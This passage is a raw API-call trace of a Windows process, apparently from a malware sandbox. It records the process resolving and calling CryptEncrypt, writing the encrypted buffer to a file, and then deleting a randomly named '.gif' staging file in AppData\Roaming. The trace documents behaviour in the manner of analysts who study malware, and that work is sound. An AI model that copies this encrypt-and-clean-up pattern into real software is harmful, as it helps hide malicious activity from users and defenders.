wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.262] CharLowerBuffW (in: lpsz="byte[81408]", cchLength=0xb | out: lpsz="byte[81408]") returned 0xb [0113.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.264] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.264] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.265] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa270, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.266] CryptEncrypt (in: hKey=0x9a47c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d3e50*, pdwDataLen=0x8cef60*=0x13dfb, dwBufLen=0x13e00 | out: pbData=0x37d3e50*, pdwDataLen=0x8cef60*=0x13e00) returned 1 [0113.270] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.271] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0113.271] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.272] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0113.272] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.272] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.272] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0113.272] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.272] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0113.272] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.272] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.272] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.272] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.272] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.272] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.272] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.272] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.272] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.272] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.272] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.272] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.279] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.279] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.279] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.280] WriteFile (in: hFile=0x4b0, lpBuffer=0x2a8df38*, nNumberOfBytesToWrite=0x13e00, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8df38*, lpNumberOfBytesWritten=0x8cf5e4*=0x13e00, lpOverlapped=0x0) returned 1 [0113.283] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.283] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.283] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0113.283] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.283] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0113.283] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.283] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.283] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.283] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0113.284] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.284] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0113.284] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0113.284] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa4f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0113.284] CryptDestroyKey (hKey=0x9a47c0) returned 1 [0113.284] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.284] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.284] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0113.284] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.284] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0113.284] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.284] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.284] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0113.285] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0113.285] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0113.285] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0113.285] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0113.285] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0113.285] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.285] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.285] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0113.285] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.285] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0113.285] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0113.285] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.285] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.285] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.285] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.285] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.285] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0113.285] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.285] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0113.285] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.285] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.286] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0113.286] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.286] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0113.286] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.286] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.286] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.286] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.286] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.286] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.286] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.286] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.286] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.286] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.286] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.286] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.286] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.286] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.286] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.286] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0113.286] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.286] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0113.286] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.286] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0113.287] CryptReleaseContext (hProv=0x9bf5d8, dwFlags=0x0) returned 1 [0113.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.287] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.287] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.287] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.287] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.287] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.287] FreeLibrary (hLibModule=0x76390000) returned 1 [0113.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.287] CloseHandle (hObject=0x4ec) returned 1 [0113.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.288] CloseHandle (hObject=0x4b0) returned 1 [0113.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.291] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.291] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0113.291] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0113.291] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/1px3r9YZM.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\1px3r9YZM.gif", lpFilePart=0x8cedf4*="1px3r9YZM.gif") returned 0x2d [0113.291] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\1px3r9YZM.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\1px3r9yzm.gif")) returned 0x20 [0113.291] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\1px3r9YZM.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e61f40, ftCreationTime.dwHighDateTime=0x1d5c949, ftLastAccessTime.dwLowDateTime=0x84eb2f50, ftLastAccessTime.dwHighDateTime=0x1d5c906, ftLastWriteTime.dwLowDateTime=0x84eb2f50, ftLastWriteTime.dwHighDateTime=0x1d5c906, nFileSizeHigh=0x0, nFileSizeLow=0x13dfb, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="1px3r9YZM.gif", cAlternateFileName="1PX3R9~1.GIF")) returned 0x9a47c0 [0113.291] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\1px3r9YZM.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\1px3r9yzm.gif")) returned 1 [0113.334] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e61f40, ftCreationTime.dwHighDateTime=0x1d5c949, ftLastAccessTime.dwLowDateTime=0x84eb2f50, ftLastAccessTime.dwHighDateTime=0x1d5c906, ftLastWriteTime.dwLowDateTime=0x84eb2f50, ftLastWriteTime.dwHighDateTime=0x1d5c906, nFileSizeHigh=0x0, nFileSizeLow=0x13dfb, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="1px3r9YZM.gif", cAlternateFileName="1PX3R9~1.GIF")) returned 0 [0113.334] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0113.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0113.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0113.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0113.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0113.335] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0113.335] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0113.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 